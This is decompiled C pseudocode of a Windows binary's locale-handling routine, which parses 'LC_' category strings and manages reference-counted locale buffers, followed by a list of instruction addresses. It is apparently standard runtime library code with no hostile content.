                                                                      				signed int _v740;
                                                                      				signed int _v744;
                                                                      				signed int _v748;
                                                                      				signed int _v752;
                                                                      				char _v820;
                                                                      				char _v1248;
                                                                      				char _v1256;
                                                                      				intOrPtr _v1276;
                                                                      				signed int _v1292;
                                                                      				signed int _t241;
                                                                      				void* _t244;
                                                                      				signed int _t247;
                                                                      				signed int _t249;
                                                                      				signed int _t255;
                                                                      				signed int _t256;
                                                                      				signed int _t257;
                                                                      				signed int _t258;
                                                                      				signed int _t259;
                                                                      				signed int _t261;
                                                                      				signed int _t263;
                                                                      				void* _t265;
                                                                      				signed int _t266;
                                                                      				signed int _t267;
                                                                      				signed int _t268;
                                                                      				signed int _t270;
                                                                      				signed int _t273;
                                                                      				signed int _t280;
                                                                      				signed int _t281;
                                                                      				signed int _t282;
                                                                      				intOrPtr _t283;
                                                                      				signed int _t286;
                                                                      				signed int _t290;
                                                                      				signed int _t291;
                                                                      				intOrPtr _t293;
                                                                      				signed int _t296;
                                                                      				signed int _t297;
                                                                      				signed int _t299;
                                                                      				signed int _t319;
                                                                      				signed int _t320;
                                                                      				signed int _t323;
                                                                      				signed int _t328;
                                                                      				void* _t330;
                                                                      				signed int _t332;
                                                                      				void* _t333;
                                                                      				intOrPtr _t334;
                                                                      				signed int _t339;
                                                                      				signed int _t340;
                                                                      				intOrPtr* _t343;
                                                                      				signed int _t357;
                                                                      				signed int _t359;
                                                                      				signed int _t361;
                                                                      				intOrPtr* _t362;
                                                                      				signed int _t364;
                                                                      				signed int _t370;
                                                                      				intOrPtr* _t374;
                                                                      				intOrPtr* _t377;
                                                                      				void* _t380;
                                                                      				intOrPtr* _t381;
                                                                      				intOrPtr* _t382;
                                                                      				signed int _t393;
                                                                      				signed int _t396;
                                                                      				intOrPtr* _t397;
                                                                      				signed int _t399;
                                                                      				signed int* _t403;
                                                                      				intOrPtr* _t410;
                                                                      				intOrPtr* _t411;
                                                                      				signed int _t421;
                                                                      				short _t422;
                                                                      				void* _t424;
                                                                      				signed int _t425;
                                                                      				signed int _t427;
                                                                      				intOrPtr _t428;
                                                                      				signed int _t431;
                                                                      				intOrPtr _t432;
                                                                      				signed int _t434;
                                                                      				signed int _t437;
                                                                      				intOrPtr _t443;
                                                                      				signed int _t444;
                                                                      				signed int _t446;
                                                                      				signed int _t447;
                                                                      				signed int _t450;
                                                                      				signed int _t452;
                                                                      				signed int _t456;
                                                                      				signed int* _t457;
                                                                      				intOrPtr* _t458;
                                                                      				short _t459;
                                                                      				void* _t461;
                                                                      				signed int _t463;
                                                                      				signed int _t465;
                                                                      				void* _t467;
                                                                      				void* _t468;
                                                                      				void* _t470;
                                                                      				signed int _t471;
                                                                      				void* _t472;
                                                                      				void* _t474;
                                                                      				signed int _t475;
                                                                      				void* _t477;
                                                                      				void* _t479;
                                                                      				intOrPtr _t491;
                                                                      
                                                                      				_t420 = __edx;
                                                                      				_t461 = _t467;
                                                                      				_t468 = _t467 - 0xc;
                                                                      				_push(__ebx);
                                                                      				_push(__esi);
                                                                      				_v12 = 1;
                                                                      				_t357 = E004421F7(__ecx, 0x6a6);
                                                                      				_t240 = 0;
                                                                      				_pop(_t370);
                                                                      				if(_t357 == 0) {
                                                                      					L20:
                                                                      					return _t240;
                                                                      				} else {
                                                                      					_push(__edi);
                                                                      					_t2 = _t357 + 4; // 0x4
                                                                      					_t427 = _t2;
                                                                      					 *_t427 = 0;
                                                                      					 *_t357 = 1;
                                                                      					_t443 = _a4;
                                                                      					_t4 = _t443 + 0x30; // 0x4405ba
                                                                      					_t241 = _t4;
                                                                      					_push( *_t241);
                                                                      					_v16 = _t241;
                                                                      					_push(0x458550);
                                                                      					_push( *0x45840c);
                                                                      					E00440CFA(_t357, _t370, __edx, _t427, _t443, _t427, 0x351, 3);
                                                                      					_t470 = _t468 + 0x18;
                                                                      					_v8 = 0x45840c;
                                                                      					while(1) {
                                                                      						L2:
                                                                      						_t244 = E0044BCF8(_t427, 0x351, ";");
                                                                      						_t471 = _t470 + 0xc;
                                                                      						if(_t244 != 0) {
                                                                      							break;
                                                                      						} else {
                                                                      							_t8 = _v16 + 0x10; // 0x10
                                                                      							_t410 = _t8;
                                                                      							_t339 =  *_v16;
                                                                      							_v16 = _t410;
                                                                      							_t411 =  *_t410;
                                                                      							goto L4;
                                                                      						}
                                                                      						while(1) {
                                                                      							L4:
                                                                      							_t420 =  *_t339;
                                                                      							if(_t420 !=  *_t411) {
                                                                      								break;
                                                                      							}
                                                                      							if(_t420 == 0) {
                                                                      								L8:
                                                                      								_t340 = 0;
                                                                      							} else {
                                                                      								_t420 =  *((intOrPtr*)(_t339 + 2));
                                                                      								if(_t420 !=  *((intOrPtr*)(_t411 + 2))) {
                                                                      									break;
                                                                      								} else {
                                                                      									_t339 = _t339 + 4;
                                                                      									_t411 = _t411 + 4;
                                                                      									if(_t420 != 0) {
                                                                      										continue;
                                                                      									} else {
                                                                      										goto L8;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      							L10:
                                                                      							asm("sbb eax, eax");
                                                                      							_t370 = _v8 + 0xc;
                                                                      							_v8 = _t370;
                                                                      							_v12 = _v12 &  !( ~_t340);
                                                                      							_t343 = _v16;
                                                                      							_v16 = _t343;
                                                                      							_push( *_t343);
                                                                      							_push(0x458550);
                                                                      							_push( *_t370);
                                                                      							E00440CFA(_t357, _t370, _t420, _t427, _t443, _t427, 0x351, 3);
                                                                      							_t470 = _t471 + 0x18;
                                                                      							if(_v8 < 0x45843c) {
                                                                      								goto L2;
                                                                      							} else {
                                                                      								if(_v12 != 0) {
                                                                      									E004427C2(_t357);
                                                                      									_t31 = _t443 + 0x28; // 0x30ff068b
                                                                      									_t434 = _t427 | 0xffffffff;
                                                                      									__eflags =  *_t31;
                                                                      									if(__eflags != 0) {
                                                                      										asm("lock xadd [ecx], eax");
                                                                      										if(__eflags == 0) {
                                                                      											_t32 = _t443 + 0x28; // 0x30ff068b
                                                                      											E004427C2( *_t32);
                                                                      										}
                                                                      									}
                                                                      									_t33 = _t443 + 0x24; // 0x30ff0c46
                                                                      									__eflags =  *_t33;
                                                                      									if( *_t33 != 0) {
                                                                      										asm("lock xadd [eax], edi");
                                                                      										__eflags = _t434 == 1;
                                                                      										if(_t434 == 1) {
                                                                      											_t34 = _t443 + 0x24; // 0x30ff0c46
                                                                      											E004427C2( *_t34);
                                                                      										}
                                                                      									}
                                                                      									 *(_t443 + 0x24) = 0;
                                                                      									 *(_t443 + 0x1c) = 0;
                                                                      									 *(_t443 + 0x28) = 0;
                                                                      									 *((intOrPtr*)(_t443 + 0x20)) = 0;
                                                                      									_t39 = _t443 + 0x40; // 0x10468b00
                                                                      									_t240 =  *_t39;
                                                                      								} else {
                                                                      									_t20 = _t443 + 0x28; // 0x30ff068b
                                                                      									_t437 = _t427 | 0xffffffff;
                                                                      									_t491 =  *_t20;
                                                                      									if(_t491 != 0) {
                                                                      										asm("lock xadd [ecx], eax");
                                                                      										if(_t491 == 0) {
                                                                      											_t21 = _t443 + 0x28; // 0x30ff068b
                                                                      											E004427C2( *_t21);
                                                                      										}
                                                                      									}
                                                                      									_t22 = _t443 + 0x24; // 0x30ff0c46
                                                                      									if( *_t22 != 0) {
                                                                      										asm("lock xadd [eax], edi");
                                                                      										if(_t437 == 1) {
                                                                      											_t23 = _t443 + 0x24; // 0x30ff0c46
                                                                      											E004427C2( *_t23);
                                                                      										}
                                                                      									}
                                                                      									 *(_t443 + 0x24) =  *(_t443 + 0x24) & 0x00000000;
                                                                      									_t26 = _t357 + 4; // 0x4
                                                                      									_t240 = _t26;
                                                                      									 *(_t443 + 0x1c) =  *(_t443 + 0x1c) & 0x00000000;
                                                                      									 *(_t443 + 0x28) = _t357;
                                                                      									 *((intOrPtr*)(_t443 + 0x20)) = _t240;
                                                                      								}
                                                                      								goto L20;
                                                                      							}
                                                                      							goto L130;
                                                                      						}
                                                                      						asm("sbb eax, eax");
                                                                      						_t340 = _t339 | 0x00000001;
                                                                      						__eflags = _t340;
                                                                      						goto L10;
                                                                      					}
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					E00438659();
                                                                      					asm("int3");
                                                                      					_push(_t461);
                                                                      					_t463 = _t471;
                                                                      					_t472 = _t471 - 0x1d0;
                                                                      					_t247 =  *0x46c00c; // 0xe1ce05e9
                                                                      					_v56 = _t247 ^ _t463;
                                                                      					_t249 = _v40;
                                                                      					_push(_t357);
                                                                      					_push(_t443);
                                                                      					_t444 = _v36;
                                                                      					_push(_t427);
                                                                      					_t428 = _v44;
                                                                      					_v508 = _t428;
                                                                      					__eflags = _t249;
                                                                      					if(_t249 == 0) {
                                                                      						_v456 = 1;
                                                                      						_v468 = 0;
                                                                      						_t359 = 0;
                                                                      						_v452 = 0;
                                                                      						__eflags = _t444;
                                                                      						if(__eflags == 0) {
                                                                      							L79:
                                                                      							E00440DBB(_t359, _t370, _t420, _t428, _t444, __eflags, _t428);
                                                                      							goto L80;
                                                                      						} else {
                                                                      							__eflags =  *_t444 - 0x4c;
                                                                      							if( *_t444 != 0x4c) {
                                                                      								L58:
                                                                      								_push(0);
                                                                      								_t255 = E00440983(_t359, _t420, _t428, _t444, _t444,  &_v276, 0x83,  &_v448, 0x55);
                                                                      								_t474 = _t472 + 0x18;
                                                                      								__eflags = _t255;
                                                                      								if(_t255 != 0) {
                                                                      									_t370 = 0;
                                                                      									__eflags = 0;
                                                                      									_t76 = _t428 + 0x20; // 0x4405aa
                                                                      									_t421 = _t76;
                                                                      									_t446 = 0;
                                                                      									_v452 = _t421;
                                                                      									do {
                                                                      										__eflags = _t446;
                                                                      										if(_t446 == 0) {
                                                                      											L73:
                                                                      											_t256 = _v456;
                                                                      										} else {
                                                                      											_t374 =  *_t421;
                                                                      											_t257 =  &_v276;
                                                                      											while(1) {
                                                                      												__eflags =  *_t257 -  *_t374;
                                                                      												_t428 = _v464;
                                                                      												if( *_t257 !=  *_t374) {
                                                                      													break;
                                                                      												}
                                                                      												__eflags =  *_t257;
                                                                      												if( *_t257 == 0) {
                                                                      													L66:
                                                                      													_t370 = 0;
                                                                      													_t258 = 0;
                                                                      												} else {
                                                                      													_t422 =  *((intOrPtr*)(_t257 + 2));
                                                                      													__eflags = _t422 -  *((intOrPtr*)(_t374 + 2));
                                                                      													_v458 = _t422;
                                                                      													_t421 = _v452;
                                                                      													if(_t422 !=  *((intOrPtr*)(_t374 + 2))) {
                                                                      														break;
                                                                      													} else {
                                                                      														_t257 = _t257 + 4;
                                                                      														_t374 = _t374 + 4;
                                                                      														__eflags = _v458;
                                                                      														if(_v458 != 0) {
                                                                      															continue;
                                                                      														} else {
                                                                      															goto L66;
                                                                      														}
                                                                      													}
                                                                      												}
                                                                      												L68:
                                                                      												__eflags = _t258;
                                                                      												if(_t258 == 0) {
                                                                      													_t359 = _t359 + 1;
                                                                      													__eflags = _t359;
                                                                      													goto L73;
                                                                      												} else {
                                                                      													_t259 =  &_v276;
                                                                      													_push(_t259);
                                                                      													_push(_t446);
                                                                      													_push(_t428);
                                                                      													L83();
                                                                      													_t421 = _v452;
                                                                      													_t474 = _t474 + 0xc;
                                                                      													__eflags = _t259;
                                                                      													if(_t259 == 0) {
                                                                      														_t370 = 0;
                                                                      														_t256 = 0;
                                                                      														_v456 = 0;
                                                                      													} else {
                                                                      														_t359 = _t359 + 1;
                                                                      														_t370 = 0;
                                                                      														goto L73;
                                                                      													}
                                                                      												}
                                                                      												goto L74;
                                                                      											}
                                                                      											asm("sbb eax, eax");
                                                                      											_t258 = _t257 | 0x00000001;
                                                                      											_t370 = 0;
                                                                      											__eflags = 0;
                                                                      											goto L68;
                                                                      										}
                                                                      										L74:
                                                                      										_t446 = _t446 + 1;
                                                                      										_t421 = _t421 + 0x10;
                                                                      										_v452 = _t421;
                                                                      										__eflags = _t446 - 5;
                                                                      									} while (_t446 <= 5);
                                                                      									__eflags = _t256;
                                                                      									if(__eflags != 0) {
                                                                      										goto L79;
                                                                      									} else {
                                                                      										__eflags = _t359;
                                                                      										goto L77;
                                                                      									}
                                                                      								}
                                                                      								goto L80;
                                                                      							} else {
                                                                      								__eflags =  *(_t444 + 2) - 0x43;
                                                                      								if( *(_t444 + 2) != 0x43) {
                                                                      									goto L58;
                                                                      								} else {
                                                                      									__eflags =  *((short*)(_t444 + 4)) - 0x5f;
                                                                      									if( *((short*)(_t444 + 4)) != 0x5f) {
                                                                      										goto L58;
                                                                      									} else {
                                                                      										while(1) {
                                                                      											_t261 = E0044CE58(_t444, 0x458548);
                                                                      											_t361 = _t261;
                                                                      											_v472 = _t361;
                                                                      											_pop(_t376);
                                                                      											__eflags = _t361;
                                                                      											if(_t361 == 0) {
                                                                      												break;
                                                                      											}
                                                                      											_t263 = _t261 - _t444;
                                                                      											__eflags = _t263;
                                                                      											_v456 = _t263 >> 1;
                                                                      											if(_t263 == 0) {
                                                                      												break;
                                                                      											} else {
                                                                      												_t265 = 0x3b;
                                                                      												__eflags =  *_t361 - _t265;
                                                                      												if( *_t361 == _t265) {
                                                                      													break;
                                                                      												} else {
                                                                      													_t431 = _v456;
                                                                      													_t362 = 0x45840c;
                                                                      													_v460 = 1;
                                                                      													do {
                                                                      														_t266 = E0044CE1E( *_t362, _t444, _t431);
                                                                      														_t472 = _t472 + 0xc;
                                                                      														__eflags = _t266;
                                                                      														if(_t266 != 0) {
                                                                      															goto L45;
                                                                      														} else {
                                                                      															_t377 =  *_t362;
                                                                      															_t420 = _t377 + 2;
                                                                      															do {
                                                                      																_t334 =  *_t377;
                                                                      																_t377 = _t377 + 2;
                                                                      																__eflags = _t334 - _v468;
                                                                      															} while (_t334 != _v468);
                                                                      															_t376 = _t377 - _t420 >> 1;
                                                                      															__eflags = _t431 - _t377 - _t420 >> 1;
                                                                      															if(_t431 != _t377 - _t420 >> 1) {
                                                                      																goto L45;
                                                                      															}
                                                                      														}
                                                                      														break;
                                                                      														L45:
                                                                      														_v460 = _v460 + 1;
                                                                      														_t362 = _t362 + 0xc;
                                                                      														__eflags = _t362 - 0x45843c;
                                                                      													} while (_t362 <= 0x45843c);
                                                                      													_t359 = _v472 + 2;
                                                                      													_t267 = E0044CDCE(_t376, _t359, ";");
                                                                      													_t428 = _v464;
                                                                      													_t447 = _t267;
                                                                      													_pop(_t380);
                                                                      													__eflags = _t447;
                                                                      													if(_t447 != 0) {
                                                                      														L48:
                                                                      														__eflags = _v460 - 5;
                                                                      														if(_v460 > 5) {
                                                                      															_t268 = _v452;
                                                                      															goto L54;
                                                                      														} else {
                                                                      															_push(_t447);
                                                                      															_t270 = E0044BE3A(_t380,  &_v276, 0x83, _t359);
                                                                      															_t475 = _t472 + 0x10;
                                                                      															__eflags = _t270;
                                                                      															if(_t270 != 0) {
                                                                      																L82:
                                                                      																_push(0);
                                                                      																_push(0);
                                                                      																_push(0);
                                                                      																_push(0);
                                                                      																_push(0);
                                                                      																E00438659();
                                                                      																asm("int3");
                                                                      																_push(_t463);
                                                                      																_t465 = _t475;
                                                                      																_t273 =  *0x46c00c; // 0xe1ce05e9
                                                                      																_v556 = _t273 ^ _t465;
                                                                      																_push(_t359);
                                                                      																_t364 = _v540;
                                                                      																_push(_t447);
                                                                      																_push(_t428);
                                                                      																_t432 = _v544;
                                                                      																_v1292 = _t364;
                                                                      																_v1276 = E00444255(_t364, _t380, _t420) + 0x278;
                                                                      																_push( &_v1256);
                                                                      																_t280 = E00440983(_t364, _t420, _t432, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55);
                                                                      																_t477 = _t475 - 0x2e4 + 0x18;
                                                                      																__eflags = _t280;
                                                                      																if(_t280 != 0) {
                                                                      																	_t101 = _t364 + 2; // 0x6
                                                                      																	_t450 = _t101 << 4;
                                                                      																	__eflags = _t450;
                                                                      																	_t281 =  &_v280;
                                                                      																	_v724 = _t450;
                                                                      																	_t381 =  *((intOrPtr*)(_t450 + _t432));
                                                                      																	while(1) {
                                                                      																		_v712 = _v712 & 0x00000000;
                                                                      																		__eflags =  *_t281 -  *_t381;
                                                                      																		_t452 = _v724;
                                                                      																		if( *_t281 !=  *_t381) {
                                                                      																			break;
                                                                      																		}
                                                                      																		__eflags =  *_t281;
                                                                      																		if( *_t281 == 0) {
                                                                      																			L91:
                                                                      																			_t282 = _v712;
                                                                      																		} else {
                                                                      																			_t459 =  *((intOrPtr*)(_t281 + 2));
                                                                      																			__eflags = _t459 -  *((intOrPtr*)(_t381 + 2));
                                                                      																			_v718 = _t459;
                                                                      																			_t452 = _v724;
                                                                      																			if(_t459 !=  *((intOrPtr*)(_t381 + 2))) {
                                                                      																				break;
                                                                      																			} else {
                                                                      																				_t281 = _t281 + 4;
                                                                      																				_t381 = _t381 + 4;
                                                                      																				__eflags = _v718;
                                                                      																				if(_v718 != 0) {
                                                                      																					continue;
                                                                      																				} else {
                                                                      																					goto L91;
                                                                      																				}
                                                                      																			}
                                                                      																		}
                                                                      																		L93:
                                                                      																		__eflags = _t282;
                                                                      																		if(_t282 != 0) {
                                                                      																			_t382 =  &_v280;
                                                                      																			_t424 = _t382 + 2;
                                                                      																			do {
                                                                      																				_t283 =  *_t382;
                                                                      																				_t382 = _t382 + 2;
                                                                      																				__eflags = _t283 - _v712;
                                                                      																			} while (_t283 != _v712);
                                                                      																			_v728 = (_t382 - _t424 >> 1) + 1;
                                                                      																			_t286 = E004421F7(_t382 - _t424 >> 1, 4 + ((_t382 - _t424 >> 1) + 1) * 2);
                                                                      																			_v740 = _t286;
                                                                      																			__eflags = _t286;
                                                                      																			if(_t286 == 0) {
                                                                      																				goto L84;
                                                                      																			} else {
                                                                      																				_v732 =  *((intOrPtr*)(_t452 + _t432));
                                                                      																				_t125 = _t364 * 4; // 0xcbd5
                                                                      																				_v744 =  *((intOrPtr*)(_t432 + _t125 + 0xa0));
                                                                      																				_t128 = _t432 + 8; // 0x8b56ff8b
                                                                      																				_v748 =  *_t128;
                                                                      																				_t391 =  &_v280;
                                                                      																				_v720 = _t286 + 4;
                                                                      																				_t290 = E00443BA1(_t286 + 4, _v728,  &_v280);
                                                                      																				_t479 = _t477 + 0xc;
                                                                      																				__eflags = _t290;
                                                                      																				if(_t290 != 0) {
                                                                      																					_t291 = _v712;
                                                                      																					_push(_t291);
                                                                      																					_push(_t291);
                                                                      																					_push(_t291);
                                                                      																					_push(_t291);
                                                                      																					_push(_t291);
                                                                      																					E00438659();
                                                                      																					asm("int3");
                                                                      																					_t293 =  *0x46d508; // 0x0
                                                                      																					return _t293;
                                                                      																				} else {
                                                                      																					__eflags = _v280 - 0x43;
                                                                      																					 *((intOrPtr*)(_t452 + _t432)) = _v720;
                                                                      																					if(_v280 != 0x43) {
                                                                      																						L102:
                                                                      																						_t296 = E00440690(_t364, _t391, _t432,  &_v708);
                                                                      																						_t393 = _v712;
                                                                      																						 *(_t432 + 0xa0 + _t364 * 4) = _t296;
                                                                      																					} else {
                                                                      																						__eflags = _v278;
                                                                      																						if(_v278 != 0) {
                                                                      																							goto L102;
                                                                      																						} else {
                                                                      																							_t393 = _v712;
                                                                      																							 *(_t432 + 0xa0 + _t364 * 4) = _t393;
                                                                      																						}
                                                                      																					}
                                                                      																					__eflags = _t364 - 2;
                                                                      																					if(_t364 != 2) {
                                                                      																						__eflags = _t364 - 1;
                                                                      																						if(_t364 != 1) {
                                                                      																							__eflags = _t364 - 5;
                                                                      																							if(_t364 == 5) {
                                                                      																								 *((intOrPtr*)(_t432 + 0x14)) = _v716;
                                                                      																							}
                                                                      																						} else {
                                                                      																							 *((intOrPtr*)(_t432 + 0x10)) = _v716;
                                                                      																						}
                                                                      																					} else {
                                                                      																						_t457 = _v736;
                                                                      																						_t425 = _t393;
                                                                      																						_t403 = _t457;
                                                                      																						 *(_t432 + 8) = _v716;
                                                                      																						_v720 = _t457;
                                                                      																						_v728 = _t457[8];
                                                                      																						_v716 = _t457[9];
                                                                      																						while(1) {
                                                                      																							_t154 = _t432 + 8; // 0x8b56ff8b
                                                                      																							__eflags =  *_t154 -  *_t403;
                                                                      																							if( *_t154 ==  *_t403) {
                                                                      																								break;
                                                                      																							}
                                                                      																							_t458 = _v720;
                                                                      																							_t425 = _t425 + 1;
                                                                      																							_t328 =  *_t403;
                                                                      																							 *_t458 = _v728;
                                                                      																							_v716 = _t403[1];
                                                                      																							_t403 = _t458 + 8;
                                                                      																							 *((intOrPtr*)(_t458 + 4)) = _v716;
                                                                      																							_t364 = _v752;
                                                                      																							_t457 = _v736;
                                                                      																							_v728 = _t328;
                                                                      																							_v720 = _t403;
                                                                      																							__eflags = _t425 - 5;
                                                                      																							if(_t425 < 5) {
                                                                      																								continue;
                                                                      																							} else {
                                                                      																							}
                                                                      																							L110:
                                                                      																							__eflags = _t425 - 5;
                                                                      																							if(__eflags == 0) {
                                                                      																								_t178 = _t432 + 8; // 0x8b56ff8b
                                                                      																								_t319 = E0044CE9D(_t364, _t425, _t432, _t457, __eflags, _v712, 1, 0x4584c8, 0x7f,  &_v536,  *_t178, 1);
                                                                      																								_t479 = _t479 + 0x1c;
                                                                      																								__eflags = _t319;
                                                                      																								_t320 = _v712;
                                                                      																								if(_t319 == 0) {
                                                                      																									_t457[1] = _t320;
                                                                      																								} else {
                                                                      																									do {
                                                                      																										 *(_t465 + _t320 * 2 - 0x20c) =  *(_t465 + _t320 * 2 - 0x20c) & 0x000001ff;
                                                                      																										_t320 = _t320 + 1;
                                                                      																										__eflags = _t320 - 0x7f;
                                                                      																									} while (_t320 < 0x7f);
                                                                      																									_t323 = E004338FA( &_v536,  *0x46c160, 0xfe);
                                                                      																									_t479 = _t479 + 0xc;
                                                                      																									__eflags = _t323;
                                                                      																									_t457[1] = 0 | _t323 == 0x00000000;
                                                                      																								}
                                                                      																								_t193 = _t432 + 8; // 0x8b56ff8b
                                                                      																								 *_t457 =  *_t193;
                                                                      																							}
                                                                      																							 *(_t432 + 0x18) = _t457[1];
                                                                      																							goto L121;
                                                                      																						}
                                                                      																						__eflags = _t425;
                                                                      																						if(_t425 != 0) {
                                                                      																							 *_t457 =  *(_t457 + _t425 * 8);
                                                                      																							_t457[1] =  *(_t457 + 4 + _t425 * 8);
                                                                      																							 *(_t457 + _t425 * 8) = _v728;
                                                                      																							 *(_t457 + 4 + _t425 * 8) = _v716;
                                                                      																						}
                                                                      																						goto L110;
                                                                      																					}
                                                                      																					L121:
                                                                      																					_t297 = _t364 * 0xc;
                                                                      																					_t200 = _t297 + 0x458408; // 0x40df7b
                                                                      																					 *0x4544b0(_t432);
                                                                      																					_t299 =  *((intOrPtr*)( *_t200))();
                                                                      																					_t396 = _v732;
                                                                      																					__eflags = _t299;
                                                                      																					if(_t299 == 0) {
                                                                      																						__eflags = _t396 - 0x46c298;
                                                                      																						if(_t396 != 0x46c298) {
                                                                      																							_t456 = _t364 + _t364;
                                                                      																							__eflags = _t456;
                                                                      																							asm("lock xadd [eax], ecx");
                                                                      																							if(_t456 != 0) {
                                                                      																								goto L126;
                                                                      																							} else {
                                                                      																								_t218 = _t456 * 8; // 0x30ff068b
                                                                      																								E004427C2( *((intOrPtr*)(_t432 + _t218 + 0x28)));
                                                                      																								_t221 = _t456 * 8; // 0x30ff0c46
                                                                      																								E004427C2( *((intOrPtr*)(_t432 + _t221 + 0x24)));
                                                                      																								_t224 = _t364 * 4; // 0xcbd5
                                                                      																								E004427C2( *((intOrPtr*)(_t432 + _t224 + 0xa0)));
                                                                      																								_t399 = _v712;
                                                                      																								 *((intOrPtr*)(_v724 + _t432)) = _t399;
                                                                      																								 *(_t432 + 0xa0 + _t364 * 4) = _t399;
                                                                      																							}
                                                                      																						}
                                                                      																						_t397 = _v740;
                                                                      																						 *_t397 = 1;
                                                                      																						 *((intOrPtr*)(_t432 + 0x28 + (_t364 + _t364) * 8)) = _t397;
                                                                      																					} else {
                                                                      																						 *(_v724 + _t432) = _t396;
                                                                      																						_t205 = _t364 * 4; // 0xcbd5
                                                                      																						E004427C2( *((intOrPtr*)(_t432 + _t205 + 0xa0)));
                                                                      																						 *(_t432 + 0xa0 + _t364 * 4) = _v744;
                                                                      																						E004427C2(_v740);
                                                                      																						 *(_t432 + 8) = _v748;
                                                                      																						goto L84;
                                                                      																					}
                                                                      																					goto L85;
                                                                      																				}
                                                                      																			}
                                                                      																		} else {
                                                                      																			goto L85;
                                                                      																		}
                                                                      																		goto L130;
                                                                      																	}
                                                                      																	asm("sbb eax, eax");
                                                                      																	_t282 = _t281 | 0x00000001;
                                                                      																	__eflags = _t282;
                                                                      																	goto L93;
                                                                      																} else {
                                                                      																	L84:
                                                                      																	__eflags = 0;
                                                                      																	L85:
                                                                      																	__eflags = _v16 ^ _t465;
                                                                      																	return E004318FB(_v16 ^ _t465);
                                                                      																}
                                                                      															} else {
                                                                      																_t330 = _t447 + _t447;
                                                                      																__eflags = _t330 - 0x106;
                                                                      																if(_t330 >= 0x106) {
                                                                      																	E00431A2F();
                                                                      																	goto L82;
                                                                      																} else {
                                                                      																	 *((short*)(_t463 + _t330 - 0x10c)) = 0;
                                                                      																	_t332 =  &_v276;
                                                                      																	_push(_t332);
                                                                      																	_push(_v460);
                                                                      																	_push(_t428);
                                                                      																	L83();
                                                                      																	_t472 = _t475 + 0xc;
                                                                      																	__eflags = _t332;
                                                                      																	_t268 = _v452;
                                                                      																	if(_t332 != 0) {
                                                                      																		_t268 = _t268 + 1;
                                                                      																		_v452 = _t268;
                                                                      																	}
                                                                      																	L54:
                                                                      																	_t444 = _t359 + _t447 * 2;
                                                                      																	_t370 = 0;
                                                                      																	__eflags =  *_t444;
                                                                      																	if( *_t444 == 0) {
                                                                      																		L56:
                                                                      																		__eflags = _t268;
                                                                      																		L77:
                                                                      																		if(__eflags != 0) {
                                                                      																			goto L79;
                                                                      																		} else {
                                                                      																		}
                                                                      																		goto L80;
                                                                      																	} else {
                                                                      																		_t444 = _t444 + 2;
                                                                      																		__eflags =  *_t444;
                                                                      																		if( *_t444 != 0) {
                                                                      																			continue;
                                                                      																		} else {
                                                                      																			goto L56;
                                                                      																		}
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													} else {
                                                                      														_t333 = 0x3b;
                                                                      														__eflags =  *_t359 - _t333;
                                                                      														if( *_t359 != _t333) {
                                                                      															break;
                                                                      														} else {
                                                                      															goto L48;
                                                                      														}
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      											goto L130;
                                                                      										}
                                                                      										goto L80;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						__eflags = _t444;
                                                                      						if(_t444 != 0) {
                                                                      							_push(_t444);
                                                                      							_push(_t249);
                                                                      							_push(_t428);
                                                                      							L83();
                                                                      						}
                                                                      						L80:
                                                                      						__eflags = _v12 ^ _t463;
                                                                      						return E004318FB(_v12 ^ _t463);
                                                                      					}
                                                                      				}
                                                                      				L130:
                                                                      			}
                                                                      0x00441326
                                                                      0x00441329
                                                                      0x00441329
                                                                      0x00441339
                                                                      0x00441347
                                                                      0x0044134c
                                                                      0x00441353
                                                                      0x00441355
                                                                      0x00000000
                                                                      0x0044135b
                                                                      0x00441361
                                                                      0x00441367
                                                                      0x0044136e
                                                                      0x00441374
                                                                      0x00441377
                                                                      0x0044137d
                                                                      0x0044138a
                                                                      0x00441391
                                                                      0x00441396
                                                                      0x00441399
                                                                      0x0044139b
                                                                      0x004415f4
                                                                      0x004415fa
                                                                      0x004415fb
                                                                      0x004415fc
                                                                      0x004415fd
                                                                      0x004415fe
                                                                      0x004415ff
                                                                      0x00441604
                                                                      0x00441605
                                                                      0x0044160a
                                                                      0x004413a1
                                                                      0x004413a1
                                                                      0x004413af
                                                                      0x004413b2
                                                                      0x004413cd
                                                                      0x004413d4
                                                                      0x004413da
                                                                      0x004413e0
                                                                      0x004413b4
                                                                      0x004413b4
                                                                      0x004413bc
                                                                      0x00000000
                                                                      0x004413be
                                                                      0x004413be
                                                                      0x004413c4
                                                                      0x004413c4
                                                                      0x004413bc
                                                                      0x004413e7
                                                                      0x004413ea
                                                                      0x00441507
                                                                      0x0044150a
                                                                      0x00441517
                                                                      0x0044151a
                                                                      0x00441522
                                                                      0x00441522
                                                                      0x0044150c
                                                                      0x00441512
                                                                      0x00441512
                                                                      0x004413f0
                                                                      0x004413f0
                                                                      0x004413f6
                                                                      0x004413fe
                                                                      0x00441400
                                                                      0x00441403
                                                                      0x0044140c
                                                                      0x00441415
                                                                      0x0044141b
                                                                      0x0044141b
                                                                      0x0044141e
                                                                      0x00441420
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00441422
                                                                      0x00441428
                                                                      0x00441429
                                                                      0x00441434
                                                                      0x0044143c
                                                                      0x00441444
                                                                      0x00441447
                                                                      0x0044144a
                                                                      0x00441450
                                                                      0x00441456
                                                                      0x0044145c
                                                                      0x00441462
                                                                      0x00441465
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00441467
                                                                      0x0044148c
                                                                      0x0044148c
                                                                      0x0044148f
                                                                      0x00441493
                                                                      0x004414ac
                                                                      0x004414b1
                                                                      0x004414b4
                                                                      0x004414b6
                                                                      0x004414bc
                                                                      0x004414f7
                                                                      0x004414be
                                                                      0x004414be
                                                                      0x004414c3
                                                                      0x004414cb
                                                                      0x004414cc
                                                                      0x004414cc
                                                                      0x004414e3
                                                                      0x004414ea
                                                                      0x004414ed
                                                                      0x004414f2
                                                                      0x004414f2
                                                                      0x004414fa
                                                                      0x004414fd
                                                                      0x004414fd
                                                                      0x00441502
                                                                      0x00000000
                                                                      0x00441502
                                                                      0x00441469
                                                                      0x0044146b
                                                                      0x00441470
                                                                      0x00441476
                                                                      0x0044147f
                                                                      0x00441488
                                                                      0x00441488
                                                                      0x00000000
